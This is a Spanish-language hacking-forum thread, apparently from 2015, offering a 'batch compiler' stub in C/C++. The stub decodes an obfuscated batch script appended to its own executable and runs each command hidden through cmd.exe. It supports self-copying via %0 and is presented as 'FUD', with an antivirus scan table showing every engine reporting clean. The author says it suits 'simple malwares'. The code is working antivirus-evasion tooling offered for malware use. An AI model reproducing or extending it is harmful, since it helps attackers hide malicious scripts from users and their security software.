Batch Compiler [Convierte tus archivos Bat a Exe][OpenSC]

xxneeco83xx · Agosto 10, 2015, 02:56:12 AM

Hola, esta es una herramienta para quienes se dedican a programar scripts o sus cosas en batch, lo que hace este compilador es pasar tu programa a Ejecutable y lo crypta
y en ningún momento crea en el disco el archivo ni desencryptado ni cryptado, ejecuta comando por comando en memoria.
pueden usarse la variable %0 para autocopiarce con el nombre del ejecutable.

CitarCodigo del Stub! [C/C++]

Código: cpp


#include <windows.h>

int __stdcall ExecuteCommand ( IN LPSTR lpszCommand );
int __stdcall Decrypt ( LPSTR String, LPSTR Out );

int __stdcall ExecuteCommand ( IN LPSTR lpszCommand )
{

	LPSTR szPath;
	char newcommand [ lstrlenA ( lpszCommand ) + 50 ];
	STARTUPINFOA si;
	PROCESS_INFORMATION pi;
	
	ZeroMemory ( &si, sizeof ( si ) );
	ZeroMemory ( &pi, sizeof ( pi ) );

	si.cb = sizeof ( si );
	
	szPath = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 ) );

	GetSystemDirectoryA ( szPath, MAX_PATH );
	CopyMemory ( &szPath [ lstrlenA ( szPath ) ], &"\\cmd.exe", lstrlenA ( "cmd.exe" ) + 1 );

	wsprintfA ( newcommand, "/c %s", lpszCommand );
	
	CreateProcessA ( szPath, newcommand, 0, 0, false, CREATE_NO_WINDOW, 0, 0, &si, &pi );

	//ShellExecuteA ( HWND_DESKTOP, "open", szPath, newcommand, 0, SW_HIDE );

	WaitForSingleObject ( pi.hProcess, INFINITE );
	
	CloseHandle ( pi.hProcess );
	CloseHandle ( pi.hThread );

	GlobalFree ( szPath );
	
	return 0;
	
}

//Funcion para desencryptar palabras
int __stdcall Decrypt ( LPSTR String, LPSTR Out )
{

	for ( ; *String != '\0'; *String ++ )
	{
		if ( ( *String >= 65 ) && ( *String < 90 ) )
		{
			*Out = *String - 1;
		}
		else if ( ( *String >= 65 ) && ( *String == 90 ) )
		{
			*Out = *String + 1;
		}
		else if ( ( *String >= 97 ) && ( *String < 122 ) )
		{
			*Out = *String - 1;
		}
		else if ( ( *String >= 97 ) && ( *String == 122 ) )
		{
			*Out = *String - 1;
		}
		else
		{
			*Out = *String;
		}
		
		*Out ++;
	}

	return 0;
}

int WINAPI WinMain ( HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
	LPSTR lpszArgument, int nCmdFunstil )
{
	
	DWORD dwBytes, dwSize;
	HANDLE File;
	LPSTR Buffer, Command, AppName, backup;
	register DWORD bytes = 0, x = 0, total = 0, test = 0;

	AppName = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 ) );
	GetModuleFileNameA ( GetModuleHandleA ( 0L ), AppName, MAX_PATH );

	File = CreateFileA ( AppName, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0 );
	if ( File == INVALID_HANDLE_VALUE )
	{
		CloseHandle ( File );
		return EXIT_FAILURE;
	}

	dwSize = GetFileSize ( File, 0 );

	Buffer = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( dwSize + 1 ) );
	ReadFile ( File, Buffer, dwSize, &dwBytes, 0 );
	CloseHandle ( File );

	//Buscamos la firma de nuestro programa. 
	for ( bytes; bytes <= dwSize; bytes ++ )
	{
		if ( Buffer [ bytes ] == '*' && Buffer [ bytes + 1 ] == '+' &&
			Buffer [ bytes + 2 ] == '+' && Buffer [ bytes + 3 ] == '*' )
		{
			//Ajustamos el buffer y el nuevo tamaño.
			Buffer += ( bytes + 4 );
			dwSize -= ( bytes + 4 );

			break;
		}
	}

	//Desencryptamos el codigo en nustro EOF.
	backup = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( lstrlenA ( Buffer + 1 ) ) );
	CopyMemory ( &backup [ 0 ], &Buffer [ 0 ], lstrlenA ( Buffer ) );
	
	GlobalFree ( Buffer );
	
	Buffer = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( lstrlenA ( backup ) + 1 ) );
	Decrypt ( backup, Buffer );
	
	GlobalFree ( backup );

	for ( bytes = 0; bytes <= lstrlenA ( Buffer ); bytes ++ )
	{
		if ( Buffer [ bytes ] == 13 || Buffer [ bytes ] == '\n' )
		{
			Command = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( bytes + 10 ) );
			
			CopyMemory ( &Command [ 0 ], &Buffer [ 0 ], ( bytes ) );
			
			total = lstrlenA ( Command );
			for ( x = 0; x <= total; x ++ )
			{
				
				//En caso de existir la variable %0 - la sustituimos por la ruta de nuestro ejecutable.
				if ( ( Command [ x ] == '%' ) && ( Command [ x + 1 ] == 48 ) )
				{
					backup = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( lstrlenA ( Command ) + 1 ) );
					CopyMemory ( &backup [ 0 ], &Command [ 0 ], lstrlenA ( Command ) );
	
					GlobalFree ( Command );

					Command = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( bytes + lstrlenA ( AppName ) + MAX_PATH ) );
	
					CopyMemory ( &Command [ 0 ], &backup [ 0 ], x - 1 );
					lstrcatA ( Command, " " );
					backup += ( x + 2 );
					CopyMemory ( &Command [ lstrlenA ( Command ) ], &AppName [ 0 ], lstrlenA ( AppName ) );
			
					CopyMemory ( &Command [ lstrlenA ( Command ) ], &backup [ 0 ], total - ( x + 2 ) );
					
					GlobalFree ( backup );
	
					break;
				}
			}

			for ( test = 0; test <= lstrlenA ( Command ); test ++ )
			{
				if ( ( Command [ test ] == 13 ) || ( Command [ test ] == '\n' ) )
				{
				
					backup = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( lstrlenA ( Command ) + 1 ) );
					CopyMemory ( &backup [ 0 ], &Command [ 0 ], test );
					
					ExecuteCommand ( backup );
				
					Command += ( test + 1 );

					GlobalFree ( backup );
				}
			}
				
			//Ejecutamos el comando
			ExecuteCommand ( Command );

			//Reajustamos el buffer.
			Buffer += ( bytes + 2 );
			
			//Liberamos el buffer.
			GlobalFree ( Command );
		}
	}

	GlobalFree ( AppName );
	GlobalFree ( Buffer );

	return EXIT_SUCCESS;
}

ANALISIS FUD

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Antivirus   Resultado   Actualización
ALYac      20150805 Clean
AVG      20150805 Clean
AVware      20150805 Clean
Ad-Aware      20150805 Clean
AegisLab      20150805 Clean
Agnitum      20150804 Clean
AhnLab-V3      20150805 Clean
Alibaba      20150803 Clean
Antiy-AVL      20150805 Clean
Arcabit      20150805 Clean
Avast      20150805 Clean
Avira      20150805 Clean
Baidu-International      20150805 Clean
BitDefender      20150805 Clean
Bkav      20150805 Clean
ByteHero      20150805 Clean
CAT-QuickHeal      20150805 Clean
ClamAV      20150805 Clean
Comodo      20150805 Clean
Cyren      20150805 Clean
DrWeb      20150805 Clean
ESET-NOD32      20150805 Clean
Emsisoft      20150805 Clean
F-Prot      20150805 Clean
F-Secure      20150805 Clean
Fortinet      20150804 Clean
GData      20150805 Clean
Ikarus      20150805 Clean
Jiangmin      20150804 Clean
K7AntiVirus      20150805 Clean
K7GW      20150805 Clean
Kaspersky      20150805 Clean
Kingsoft      20150805 Clean
Malwarebytes      20150805 Clean
McAfee      20150805 Clean
McAfee-GW-Edition      20150805 Clean
MicroWorld-eScan      20150805 Clean
Microsoft      20150805 Clean
NANO-Antivirus      20150805 Clean
Panda      20150805 Clean
Qihoo-360      20150805 Clean
Rising      20150731 Clean
SUPERAntiSpyware      20150805 Clean
Sophos      20150805 Clean
Symantec      20150805 Clean
Tencent      20150805 Clean
TheHacker      20150805 Clean
TotalDefense      20150805 Clean
TrendMicro      20150805 Clean
TrendMicro-HouseCall      20150805Clean
VBA32      20150805 Clean
VIPRE      20150805 Clean
ViRobot      20150805 Clean
Zillya      20150805 Clean
Zoner      20150805 Clean
nProtect      20150805 Clean

Link de descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

PASS: xxneeco83xx

blackdrake · Agosto 11, 2015, 09:06:26 AM

Clásico pero efectivo, muchas gracias @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

xxneeco83xx · Agosto 11, 2015, 06:21:19 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Clásico pero efectivo, muchas gracias @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Por nada! si bien hay muchas cosas que se le pueden agregar, y mejorar, es practico para esos scripts o malwares simples.

Batch Compiler [Convierte tus archivos Bat a Exe][OpenSC]

xxneeco83xx

Agosto 10, 2015, 02:56:12 AM Ultima modificación: Agosto 10, 2015, 07:48:58 PM por EPSILON

blackdrake

Agosto 11, 2015, 09:06:26 AM #1

xxneeco83xx

Agosto 11, 2015, 06:21:19 PM #2